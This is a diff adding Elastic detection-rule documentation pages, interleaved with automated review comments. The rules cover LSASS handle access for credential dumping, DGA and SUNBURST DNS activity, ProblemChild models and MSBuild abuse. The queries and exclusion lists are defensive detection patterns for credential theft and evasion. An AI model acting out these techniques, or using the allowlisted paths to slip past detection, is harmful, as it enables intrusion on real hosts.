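Review bot: The Local Account TokenFilter Policy Disabled hunk ships with neither an investigation guide nor a false-positive note, yet setting `LocalAccountTokenFilterPolicy` to 1 is a common, documented administrative choice for remote management with local accounts, so the rule will fire on legitimate GPO or hardening-script changes as readily as on attacker activity; please add at least a short False positive analysis section describing what a sanctioned change looks like (the STIG reference already listed covers the policy). The query also has no `event.type` constraint, unlike the `event.type == "start"` scoping used by the process rules in this patch, so a re-write of an already-set value alerts the same as a flip from absent or 0 to 1; if that is intended, say so in the description.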
@@ -0,0 +1,100 @@ +[[prebuilt-rule-8-10-5-lsass-process-access-via-windows-api]] +=== LSASS Process Access via Windows API + +Identifies access attempts to the LSASS handle, which may indicate an attempt to dump credentials from LSASS memory. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +api where host.os.type == "windows" and + process.Ext.api.name in ("OpenProcess", "OpenThread") and Target.process.name : "lsass.exe" and + not process.executable : + ("?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\MsMpEng.exe", + "?:\\Program Files\\Microsoft Security Client\\MsMpEng.exe", + "?:\\Program Files*\\Windows Defender\\MsMpEng.exe", + "?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe", + "?:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "?:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe", + "?:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "?:\\Program Files (x86)\\N-able Technologies\\Reactive\\bin\\NableReactiveManagement.exe", + "?:\\Program Files\\EA\\AC\\EAAntiCheat.GameService.exe", + "?:\\Program Files\\Cisco\\AMP\\*\\sfc.exe", + "?:\\Program Files\\TDAgent\\ossec-agent\\ossec-agent.exe", + "?:\\Windows\\System32\\MRT.exe", + "?:\\Program Files\\Elastic\\Agent\\data\\elastic-agent-*\\components\\metricbeat.exe", + "?:\\Program 
Files\\Elastic\\Agent\\data\\elastic-agent-*\\components\\osqueryd.exe", + "?:\\Windows\\System32\\msiexec.exe", + "?:\\Program Files\\Common Files\\McAfee\\AVSolution\\mcshield.exe", + "?:\\Program Files\\Fortinet\\FortiClient\\FortiProxy.exe", + "?:\\Program Files\\LogicMonitor\\Agent\\bin\\sbshutdown.exe", + "?:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe", + "?:\\Program Files (x86)\\Blackpoint\\SnapAgent\\SnapAgent.exe", + "?:\\Program Files\\ESET\\ESET Security\\ekrn.exe", + "?:\\Program Files\\Huntress\\HuntressAgent.exe", + "?:\\Program Files (x86)\\eScan\\reload.exe", + "?:\\Program Files\\Topaz OFD\\Warsaw\\core.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: LSASS Memory +** ID: T1003.001 +** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc new file mode 100644 index 0000000000..2721a9b9e8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc 
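Review bot: The exclusion list in the LSASS Process Access via Windows API query is keyed purely on `process.executable` paths (MsMpEng.exe, WmiPrvSE.exe, vmtoolsd.exe, the Elastic Agent components and so on), so the allowlist is only as strong as the ACLs on those directories; pairing each path with a signer condition on the ECS `process.code_signature.subject_name` and `process.code_signature.trusted` fields would keep the same false-positive suppression without trusting the path alone. The list is also long enough that a short comment grouping the entries (AV/EDR engines, RMM agents, Elastic components, Windows built-ins) would help maintainers reason about future additions.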
@@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain]] +=== Machine Learning Detected a DNS Request Predicted to be a DGA Domain + +A supervised machine learning model has identified a DNS question name that is predicted to be the result of a Domain Generation Algorithm (DGA), which could indicate command and control network activity. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* +* logs-network_traffic.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Domain: Network +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +ml_is_dga.malicious_prediction:1 and not dns.question.registered_domain:avsvmcloud.com + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ 
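Review bot: The `==== Investigation guide` section in this DGA hunk wraps an empty `[source, markdown]` block, which renders as a heading over an empty box; either drop the section when a rule has no guide or fill it in. Separately, the query keys on `ml_is_dga.malicious_prediction:1`, an enrichment field that only exists when the DGA integration's inference pipeline is applied to the DNS data, so the page should state that the DGA integration linked under References must be installed and its pipeline enabled for this rule to ever match.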
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc new file mode 100644 index 0000000000..56e8e25762 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc 
@@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-with-a-high-dga-probability-score]] +=== Machine Learning Detected a DNS Request With a High DGA Probability Score + +A supervised machine learning model has identified a DNS question name with a high probability of sourcing from a Domain Generation Algorithm (DGA), which could indicate command and control network activity. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* +* logs-network_traffic.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Domain: Network +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +ml_is_dga.malicious_probability > 0.98 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ 
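Review bot: The description of this rule is nearly identical to the "Predicted to be a DGA Domain" page while the query uses a different condition, `ml_is_dga.malicious_probability > 0.98`; since the 0.98 cut-off is the only thing distinguishing the two rules, the description should state the threshold and explain when a user would enable this rule alongside or instead of the prediction-based one (Severity low and Risk score 21 are the same on both pages, so they give no hint). The investigation guide block is empty here as well.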
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc new file mode 100644 index 0000000000..52cb827a3e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc 
@@ -0,0 +1,78 @@ +[[prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity]] +=== Machine Learning Detected a Suspicious Windows Event Predicted to be Malicious Activity + +A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-endpoint.events.process-* +* winlogbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* OS: Windows +* Data Source: Elastic Endgame +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where (problemchild.prediction == 1 or blocklist_label == 1) and not process.args : ("*C:\\WINDOWS\\temp\\nessus_*.txt*", "*C:\\WINDOWS\\temp\\nessus_*.tmp*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: 
https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade Task or Service +** ID: T1036.004 +** Reference URL: https://attack.mitre.org/techniques/T1036/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc new file mode 100644 index 0000000000..26849fb02e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc 
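Review bot: The query `process where (problemchild.prediction == 1 or blocklist_label == 1) and not process.args : (...)` has no `host.os.type == "windows"` clause although the title, description and indices (`winlogbeat-*`, `endgame-*`) are all Windows-specific; the other process rules in this patch scope on `host.os.type`, so either add it or note that the ProblemChild fields only ever appear on Windows events. The Nessus exclusion `*C:\\WINDOWS\\temp\\nessus_*.txt*` is a sensible carve-out but deserves a False positive analysis entry explaining it, and the investigation guide block is empty.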
@@ -0,0 +1,79 @@ +[[prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score]] +=== Machine Learning Detected a Suspicious Windows Event with a High Malicious Probability Score + +A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-endpoint.events.process-* +* winlogbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* OS: Windows +* Data Source: Elastic Endgame +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where ((problemchild.prediction == 1 and problemchild.prediction_probability > 0.98) or +blocklist_label == 1) and not process.args : ("*C:\\WINDOWS\\temp\\nessus_*.txt*", "*C:\\WINDOWS\\temp\\nessus_*.tmp*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: 
T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade Task or Service +** ID: T1036.004 +** Reference URL: https://attack.mitre.org/techniques/T1036/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc new file mode 100644 index 0000000000..b44bc69b30 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc 
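Review bot: The description of this rule is copied verbatim from the "Predicted to be Malicious Activity" page and never mentions `problemchild.prediction_probability > 0.98`, which is the sole difference in the query; as with the two DGA pages, state the threshold in the description and explain how the two ProblemChild rules are meant to be used together. It is also worth saying explicitly that `blocklist_label == 1` bypasses the probability threshold entirely (correct for a blocklist hit, but users should not expect every alert from this rule to carry a 0.98+ score).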
@@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain]] +=== Machine Learning Detected DGA activity using a known SUNBURST DNS domain + +A supervised machine learning model has identified a DNS question name that used by the SUNBURST malware and is predicted to be the result of a Domain Generation Algorithm. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* +* logs-network_traffic.* + +*Severity*: critical + +*Risk score*: 99 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Domain: Network +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +ml_is_dga.malicious_prediction:1 and dns.question.registered_domain:avsvmcloud.com + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ 
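Review bot: The description "identified a DNS question name that used by the SUNBURST malware" is missing a verb ("that was used by"), and the title's "DGA activity" breaks the capitalisation of the sibling rule titles. The query `ml_is_dga.malicious_prediction:1 and dns.question.registered_domain:avsvmcloud.com` is the complement of the exclusion in the "Predicted to be a DGA Domain" rule, which is a sensible split, but with Severity critical and Risk score 99 driven by a single hard-coded domain the page should say in one sentence that any DGA-flagged query under that registered domain is treated as a SUNBURST indicator regardless of the generated subdomain.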
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-an-unusual-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-an-unusual-process.asciidoc new file mode 100644 index 0000000000..57fcb903fb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-an-unusual-process.asciidoc 
@@ -0,0 +1,85 @@ +[[prebuilt-rule-8-10-5-microsoft-build-engine-started-an-unusual-process]] +=== Microsoft Build Engine Started an Unusual Process + +An instance of MSBuild, the Microsoft Build Engine, started a PowerShell script or the Visual C# Command Line Compiler. This technique is sometimes used to deploy a malicious payload using the Build Engine. + +*Rule type*: new_terms + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 207 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:windows and event.category:process and event.type:start and process.parent.name:"MSBuild.exe" and +process.name.caseless:("csc.exe" or "iexplore.exe" or "powershell.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Obfuscated Files or Information +** ID: T1027 +** Reference URL: https://attack.mitre.org/techniques/T1027/ +* Sub-technique: +** Name: Compile After Delivery +** ID: T1027.004 +** Reference URL: https://attack.mitre.org/techniques/T1027/004/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: 
https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-by-a-script-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-by-a-script-process.asciidoc new file mode 100644 index 0000000000..ba54e6d8f1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-by-a-script-process.asciidoc 
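Review bot: the description says MSBuild "started a PowerShell script or the Visual C# Command Line Compiler", but the query also matches `iexplore.exe`; either mention Internet Explorer in the description or drop it from the list. The child side uses `process.name.caseless` while the parent side is the case-sensitive `process.parent.name:"MSBuild.exe"`, so a parent recorded as `msbuild.exe` does not match; the sibling rule in this package identifies the build engine with `process.name.caseless:"msbuild.exe" or process.pe.original_file_name:"MSBuild.exe"`, and the same pair on the parent fields (`process.parent.name.caseless`, `process.parent.pe.original_file_name`) would make the two rules consistent. The Investigation guide block is empty.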
@@ -0,0 +1,89 @@ +[[prebuilt-rule-8-10-5-microsoft-build-engine-started-by-a-script-process]] +=== Microsoft Build Engine Started by a Script Process + +An instance of MSBuild, the Microsoft Build Engine, was started by a script or the Windows command interpreter. This behavior is unusual and is sometimes used by malicious payloads. + +*Rule type*: new_terms + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 206 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:windows and event.category:process and event.type:start and ( + process.name.caseless:"msbuild.exe" or process.pe.original_file_name:"MSBuild.exe") and + process.parent.name:("cmd.exe" or "powershell.exe" or "pwsh.exe" or "powershell_ise.exe" or "cscript.exe" or + "wscript.exe" or "mshta.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: 
https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-using-an-alternate-name.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-using-an-alternate-name.asciidoc new file mode 100644 index 0000000000..5ddce7a4a1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-using-an-alternate-name.asciidoc 
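Review bot: the parent list `process.parent.name:("cmd.exe" or "powershell.exe" or "pwsh.exe" or ...)` is an exact-case match on `process.parent.name`, while the child is matched through `process.name.caseless` plus `process.pe.original_file_name`; a parent whose image name differs in case, or a renamed interpreter, is missed. Consider `process.parent.name.caseless` for the list and `process.parent.pe.original_file_name` where renamed interpreters matter. This rule also has no Investigation guide section at all, unlike the other MSBuild rules in the package, and `mshta.exe` in the parent list is not reflected in the ATT&CK mapping, which lists only T1059 sub-techniques (mshta is System Binary Proxy Execution, T1218.005).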
@@ -0,0 +1,135 @@ +[[prebuilt-rule-8-10-5-microsoft-build-engine-using-an-alternate-name]] +=== Microsoft Build Engine Using an Alternate Name + +An instance of MSBuild, the Microsoft Build Engine, was started after being renamed. This is uncommon behavior and may indicate an attempt to run unnoticed or undetected. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Microsoft Build Engine Using an Alternate Name + +The OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections. + +The Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code. + +This rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections. 
+ +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. 
+- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.pe.original_file_name == "MSBuild.exe" and + not process.name : "MSBuild.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Rename System Utilities +** ID: T1036.003 +** Reference URL: https://attack.mitre.org/techniques/T1036/003/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ diff --git 